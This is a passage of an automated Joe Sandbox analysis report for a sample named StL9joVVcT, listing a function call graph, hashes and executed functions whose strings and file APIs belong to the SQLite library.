107769->107770 107771 7ffd9449db32 107769->107771 107770->107741 107772 7ffd9449db3b 107771->107772 107775 7ffd9449db53 107771->107775 107823 7ffd943eca80 11 API calls _raise_excf 107772->107823 107774 7ffd9449db46 107774->107741 107777 7ffd9449db92 _raise_excf 107775->107777 107779 7ffd9449dd44 _raise_excf 107775->107779 107778 7ffd9449dbe4 107777->107778 107824 7ffd943eca80 11 API calls _raise_excf 107777->107824 107781 7ffd944abaa0 _raise_excf 36 API calls 107778->107781 107779->107770 107833 7ffd943eca80 11 API calls _raise_excf 107779->107833 107782 7ffd9449dc20 107781->107782 107785 7ffd9449dc49 107782->107785 107786 7ffd9449dc53 107782->107786 107791 7ffd9449dc51 107782->107791 107783 7ffd9449dc96 107828 7ffd943d8730 11 API calls _raise_excf 107783->107828 107825 7ffd944a3030 11 API calls _raise_excf 107785->107825 107786->107791 107826 7ffd943c5f90 11 API calls _raise_excf 107786->107826 107787 7ffd9449dca5 107829 7ffd943d8730 11 API calls _raise_excf 107787->107829 107791->107770 107791->107783 107792 7ffd9449dcdc _raise_excf 107791->107792 107830 7ffd944ccc90 36 API calls _raise_excf 107792->107830 107793 7ffd9449dd0f 107831 7ffd944beeb0 11 API calls _raise_excf 107793->107831 107794 7ffd9449dccd 107794->107741 107796 7ffd9449dc64 107827 7ffd943eca80 11 API calls _raise_excf 107796->107827 107799 7ffd9449dd19 107800 7ffd9449dd2d 107799->107800 107832 7ffd943dee90 11 API calls _raise_excf 107799->107832 107802 7ffd944a0790 _raise_excf 32 API calls 107800->107802 107803 7ffd9449dd35 107802->107803 107803->107741 107808 7ffd943e204b _raise_excf 107804->107808 107805 7ffd943e20a6 _raise_excf 107805->107747 107806 7ffd943e22e8 107806->107805 107854 7ffd94450a00 11 API calls 2 library calls 107806->107854 107808->107805 107808->107806 107812 7ffd943e2262 107808->107812 107834 7ffd944496b0 107808->107834 107850 7ffd94451310 30 API calls _raise_excf 107808->107850 107851 7ffd944a3700 RaiseException _raise_excf 107808->107851 107852 7ffd9444e860 12 API calls _raise_excf 107808->107852 107812->107805 107812->107806 107853 7ffd94451530 12 API calls _raise_excf 107812->107853 107815->107750 107816->107755 107817->107764 107818->107763 107819->107766 107820->107750 107821->107742 107822->107745 107823->107774 107824->107778 107825->107791 107826->107796 107827->107791 107828->107787 107829->107794 107830->107793 107831->107799 107832->107800 107833->107770 107855 7ffd944a4fe0 107834->107855 107836 7ffd944496c1 107842 7ffd944497f2 _raise_excf 107836->107842 107849 7ffd9443e4b0 30 API calls 107836->107849 107837 7ffd944498a9 _raise_excf 107837->107842 107872 7ffd94451310 30 API calls _raise_excf 107837->107872 107839 7ffd944496e8 107839->107837 107841 7ffd944497e1 107839->107841 107839->107842 107865 7ffd944a4980 107839->107865 107841->107837 107841->107842 107843 7ffd94449887 107841->107843 107844 7ffd94449857 _raise_excf 107841->107844 107842->107808 107843->107837 107871 7ffd94473ce0 11 API calls _raise_excf 107843->107871 107869 7ffd943fab90 11 API calls _raise_excf 107844->107869 107847 7ffd94449873 107870 7ffd944a4ea0 11 API calls _raise_excf 107847->107870 107849->107839 107850->107808 107851->107808 107852->107808 107853->107806 107854->107805 107856 7ffd944a52c0 _raise_excf 107855->107856 107862 7ffd944a5010 _raise_excf 107855->107862 107859 7ffd944a50af _raise_excf 107856->107859 107873 7ffd944ced30 107856->107873 107858 7ffd944a5181 _raise_excf 107858->107859 107861 7ffd944a51b4 _raise_excf 107858->107861 107880 7ffd94451ee0 12 API calls _raise_excf 107858->107880 107859->107836 107861->107856 107861->107859 107863 7ffd944a4980 _raise_excf 21 API calls 107861->107863 107862->107856 107862->107858 107862->107859 107862->107861 107879 7ffd9446fb50 11 API calls _raise_excf 107862->107879 107863->107856 107866 7ffd944a49e5 107865->107866 107867 7ffd944a4995 107865->107867 107866->107841 107867->107866 107881 7ffd94450b50 107867->107881 107869->107847 107870->107842 107871->107837 107872->107842 107875 7ffd944ced6d _raise_excf 107873->107875 107874 7ffd944e9c70 _raise_excf 30 API calls 107874->107875 107875->107874 107876 7ffd944cee01 _raise_excf 107875->107876 107877 7ffd944cedd0 _raise_excf 107875->107877 107876->107877 107878 7ffd94462470 _raise_excf RaiseException 107876->107878 107877->107859 107878->107877 107879->107858 107880->107861 107882 7ffd94450b60 _raise_excf 107881->107882 107883 7ffd944a1fc0 new[] 11 API calls 107882->107883 107886 7ffd94450c47 _raise_excf 107882->107886 107884 7ffd94450bc2 new[] 107883->107884 107884->107886 107888 7ffd943b4510 21 API calls 107884->107888 107885 7ffd94450c41 _raise_excf 107885->107886 107887 7ffd943c4c20 _raise_excf 11 API calls 107885->107887 107886->107866 107887->107886 107888->107885 107889 7ffd943c9dd0 107890 7ffd943c9de7 107889->107890 107891 7ffd943c9df0 107889->107891 107927 7ffd943d8730 11 API calls _raise_excf 107890->107927 107891->107890 107892 7ffd943c9e3e 107891->107892 107909 7ffd944b7db0 107892->107909 107894 7ffd943c9e06 107928 7ffd943d8730 11 API calls _raise_excf 107894->107928 107897 7ffd943c9e30 107898 7ffd943c9ec1 107901 7ffd943c9ec6 107904 7ffd943c9ed2 107901->107904 107931 7ffd944e0e80 11 API calls _raise_excf 107901->107931 107902 7ffd943c9e69 107902->107898 107902->107901 107905 7ffd944b7db0 _raise_excf 36 API calls 107902->107905 107929 7ffd944ae5c0 36 API calls _raise_excf 107902->107929 107930 7ffd943cb090 36 API calls _raise_excf 107902->107930 107906 7ffd943c9f2c _raise_excf 107904->107906 107907 7ffd943c4c20 _raise_excf 11 API calls 107904->107907 107905->107902 107906->107898 107932 7ffd943dee90 11 API calls _raise_excf 107906->107932 107907->107906 107910 7ffd944b7dcd 107909->107910 107921 7ffd944b7e25 _raise_excf 107909->107921 107911 7ffd944b7dec 107910->107911 107910->107921 107939 7ffd943cb090 36 API calls _raise_excf 107910->107939 107914 7ffd944b7df5 107911->107914 107911->107921 107912 7ffd944b7ea7 107933 7ffd944bf6e0 107912->107933 107913 7ffd944b7ea0 107941 7ffd944c9d70 11 API calls _raise_excf 107913->107941 107918 7ffd944b8027 107914->107918 107940 7ffd944cd890 11 API calls _raise_excf 107914->107940 107918->107902 107920 7ffd944b7ebf 107920->107902 107921->107912 107921->107913 107922 7ffd944b7e16 107922->107902 107923 7ffd944b7ea5 _raise_excf 107923->107920 107926 7ffd944b7ef3 _raise_excf 107923->107926 107942 7ffd944cd890 11 API calls _raise_excf 107923->107942 107926->107918 107943 7ffd943dee90 11 API calls _raise_excf 107926->107943 107927->107894 107928->107897 107929->107902 107930->107902 107931->107904 107932->107898 107934 7ffd944bf771 _raise_excf 107933->107934 107938 7ffd944c0443 107934->107938 107944 7ffd944a3030 11 API calls _raise_excf 107934->107944 107936 7ffd944c0434 107945 7ffd944bf630 11 API calls _raise_excf 107936->107945 107939->107910 107940->107922 107941->107923 107942->107926 107943->107918 107944->107936 107945->107938

                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                  Function 00007FFD9444F5D0 Relevance: 18.0, Strings: 14, Instructions: 540COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$:memory:$API call with %s database connection pointer$BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$invalid$main$misuse$temp$v
                                                                                                                                                                                                                  • API String ID: 0-534082081
                                                                                                                                                                                                                  • Opcode ID: 2146455264e151780ecbf24901ebefe126fae8f856e5385a6e88d213b798e284
                                                                                                                                                                                                                  • Instruction ID: 4bac14bf70126ce58215558a1e9502f6ddf0d5b2d3807536267914d69d3413f2
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2146455264e151780ecbf24901ebefe126fae8f856e5385a6e88d213b798e284
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B428B25B09B4281FBB59FE5A8A027927A1FB4BB88F448136D94D077ABCF7CE545C300
                                                                                                                                                                                                                  Function 00007FFD94462570 Relevance: 16.4, Strings: 12, Instructions: 1358COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %!S$%s.%s$%s.%s.%s$'%s' is not a function$..%s$Expression tree is too large (maximum depth %d)$access to view "%s" prohibited$no such table: %s$no tables specified$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
                                                                                                                                                                                                                  • API String ID: 0-3486433936
                                                                                                                                                                                                                  • Opcode ID: e034a36cc12bd9215a9899eeb8c44c2f5c6ffbc58f4d44d84a9563eea4d82b8e
                                                                                                                                                                                                                  • Instruction ID: edb05e4f7e334e0d84b1d550c1213e498a358fc3d4ebea183e4c73d2dc2c9871
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e034a36cc12bd9215a9899eeb8c44c2f5c6ffbc58f4d44d84a9563eea4d82b8e
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64D29E32B09BC686EB718F9591A03B967A0FB46BA4F04C235DE5D0779ADFB8E451C700
                                                                                                                                                                                                                  Function 00007FFD943B4510 Relevance: 9.3, APIs: 1, Strings: 4, Instructions: 516fileCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                  • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                  • API String ID: 823142352-3829269058
                                                                                                                                                                                                                  • Opcode ID: 9648a8e1b34e6d54a88f7339791b418315a19169b265df44462c620f0c7b9da4
                                                                                                                                                                                                                  • Instruction ID: 74c2d2aa41adca1e8bec2b9eaacdd40eb6d8c52d11de263c2d759649966524df
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9648a8e1b34e6d54a88f7339791b418315a19169b265df44462c620f0c7b9da4
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B329321B4964686FBB59BE5A8E033963A0BF57B64F04C239D95D476E2CF3CE484C704
                                                                                                                                                                                                                  Function 00007FFD9446DF40 Relevance: 1.8, Strings: 1, Instructions: 553COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: :memory:
                                                                                                                                                                                                                  • API String ID: 0-2920599690
                                                                                                                                                                                                                  • Opcode ID: bad3a322da7ddd70a11fef03fe72386b6c13d9ab35f0f024c8c279fdf6b098db
                                                                                                                                                                                                                  • Instruction ID: 4a07e37271125ec2439fb5d0aaa68afd8cac6084d5ebe7a6bfad7e7e45aed3ed
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bad3a322da7ddd70a11fef03fe72386b6c13d9ab35f0f024c8c279fdf6b098db
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9432B062B0978282EB758BA5D5A037967E1FF4AB54F148135CE4D4779AEFBCE490C300
                                                                                                                                                                                                                  Function 00007FFD944DBE70 Relevance: 1.7, APIs: 1, Instructions: 224COMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: InfoSystem
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 31276548-0
                                                                                                                                                                                                                  • Opcode ID: 052258443fd2dd5c4cc5a8169221ce28f452b2321e8c70ac96baf9597a7fa0a9
                                                                                                                                                                                                                  • Instruction ID: 4a3b742d1887655605d86bc274884ada108d38072d47833990470685f07701f9
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 052258443fd2dd5c4cc5a8169221ce28f452b2321e8c70ac96baf9597a7fa0a9
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60B1CB64B4AB4791FEBA8BD5A8F013422A0AF4BB84F14C639C91D4B766DF6CF495C700
                                                                                                                                                                                                                  Function 00007FFD944A4FE0 Relevance: .3, Instructions: 278COMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 317393ef1743365a49eef31e05f6b03ef5d1b5c47fd7b020569ada7a3cf6cb0d
                                                                                                                                                                                                                  • Instruction ID: fa7cc1f42ecccfaedea8e42e4236b9896bcea2f015c3baa74563bdd65a3f8266
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 317393ef1743365a49eef31e05f6b03ef5d1b5c47fd7b020569ada7a3cf6cb0d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91C16E22B0D68241FB798FA995A03792791EB86B88F499031DA4E4729FDEBCD845C740
                                                                                                                                                                                                                  Function 00007FFD943B5320 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 210fileCOMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 812 7ffd943b5320-7ffd943b534c 813 7ffd943b534e call 7ffd944f1dd0 812->813 814 7ffd943b5361-7ffd943b536a 812->814 818 7ffd943b5353-7ffd943b5357 813->818 816 7ffd943b536c 814->816 817 7ffd943b5379-7ffd943b537d 814->817 816->817 819 7ffd943b5395-7ffd943b5398 817->819 820 7ffd943b537f-7ffd943b538b call 7ffd944f1840 817->820 821 7ffd943b566a-7ffd943b5676 818->821 822 7ffd943b535d 818->822 824 7ffd943b5616-7ffd943b5633 819->824 825 7ffd943b539e-7ffd943b53e8 819->825 829 7ffd943b5611-7ffd943b5614 820->829 830 7ffd943b5391 820->830 822->814 827 7ffd943b5638-7ffd943b5647 824->827 833 7ffd943b53ea-7ffd943b53f9 825->833 834 7ffd943b541f-7ffd943b5421 825->834 831 7ffd943b5649-7ffd943b5650 827->831 832 7ffd943b5653-7ffd943b5659 827->832 829->824 829->827 830->819 831->832 835 7ffd943b5668 832->835 836 7ffd943b565b 832->836 833->834 844 7ffd943b53fb-7ffd943b541d call 7ffd944f1a30 833->844 837 7ffd943b5456-7ffd943b545c 834->837 838 7ffd943b5423-7ffd943b5451 call 7ffd944f1a30 834->838 835->821 836->835 840 7ffd943b54ae-7ffd943b54c4 call 7ffd943c4be0 837->840 841 7ffd943b545e-7ffd943b5466 837->841 843 7ffd943b55fd-7ffd943b560c 838->843 853 7ffd943b54c6-7ffd943b54cb 840->853 854 7ffd943b54d0-7ffd943b5502 840->854 842 7ffd943b546c-7ffd943b5470 call 7ffd943b3a80 841->842 841->843 851 7ffd943b5475-7ffd943b5479 842->851 843->829 844->834 851->840 856 7ffd943b547b-7ffd943b54a9 call 7ffd944f1a30 851->856 853->843 854->843 857 7ffd943b5508 854->857 856->843 858 7ffd943b5510-7ffd943b5539 CreateFileMappingW 857->858 860 7ffd943b553b-7ffd943b557f MapViewOfFile 858->860 861 7ffd943b55b4-7ffd943b55eb call 7ffd944f1a30 858->861 860->861 862 7ffd943b5581-7ffd943b55ac 860->862 861->843 869 7ffd943b55ed-7ffd943b55f4 861->869 862->858 864 7ffd943b55b2 862->864 864->843 869->843
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: File$CreateMappingView
                                                                                                                                                                                                                  • String ID: winFileSize$winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                                                                                  • API String ID: 3452162329-2257004166
                                                                                                                                                                                                                  • Opcode ID: e1c543edc8df27d41b3f1988979393f576ffc8e0c2855cd8eface440921c04c5
                                                                                                                                                                                                                  • Instruction ID: 85536cb289ff7664b1031e8305c0f13b6f04003aae9bfc6e6867c3f5e6785694
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1c543edc8df27d41b3f1988979393f576ffc8e0c2855cd8eface440921c04c5
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6691C372B0864286EB759FB4D4A037933A1FB8AB98F458135CA4D47B66DF3CD845C700
                                                                                                                                                                                                                  Function 00007FFD943B3A80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 95COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 1088 7ffd943b3a80-7ffd943b3a9a 1089 7ffd943b3a9c-7ffd943b3aad 1088->1089 1090 7ffd943b3aae-7ffd943b3ab4 1088->1090 1091 7ffd943b3ab6-7ffd943b3ac7 1090->1091 1092 7ffd943b3aca-7ffd943b3ad3 1090->1092 1091->1092 1093 7ffd943b3ad5-7ffd943b3ad9 1092->1093 1094 7ffd943b3adb 1092->1094 1095 7ffd943b3ade-7ffd943b3b13 call 7ffd944f2700 SetFilePointer 1093->1095 1094->1095 1098 7ffd943b3b15-7ffd943b3b24 1095->1098 1099 7ffd943b3b59-7ffd943b3b6c SetEndOfFile 1095->1099 1098->1099 1108 7ffd943b3b26-7ffd943b3b57 call 7ffd944f1a30 1098->1108 1100 7ffd943b3bab-7ffd943b3bae 1099->1100 1101 7ffd943b3b6e-7ffd943b3b80 1099->1101 1102 7ffd943b3bc7-7ffd943b3bdd 1100->1102 1103 7ffd943b3bb0-7ffd943b3bbd 1100->1103 1101->1100 1109 7ffd943b3b82-7ffd943b3b8c 1101->1109 1106 7ffd943b3bbf 1103->1106 1107 7ffd943b3bc2 call 7ffd944f1b10 1103->1107 1106->1107 1107->1102 1112 7ffd943b3b91-7ffd943b3ba9 call 7ffd944f1a30 1108->1112 1109->1112 1112->1100 1112->1102
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                                                                                  • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                                                                                  • API String ID: 973152223-2471937615
                                                                                                                                                                                                                  • Opcode ID: bcff13c8a0a6972d2ce5bbe3d7eb2012d32025ee3e99687451907a690726906a
                                                                                                                                                                                                                  • Instruction ID: a6215348a16dc4fa85e06f1784681071364190518d1ffcdc2bbd0f5bd78b48f0
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bcff13c8a0a6972d2ce5bbe3d7eb2012d32025ee3e99687451907a690726906a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE419421B18A5286E7B0DFF9E4A017973A0EB46B94F148136DE5D877AADF3CD842C700
                                                                                                                                                                                                                  Function 00007FFD943B4D70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93fileCOMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
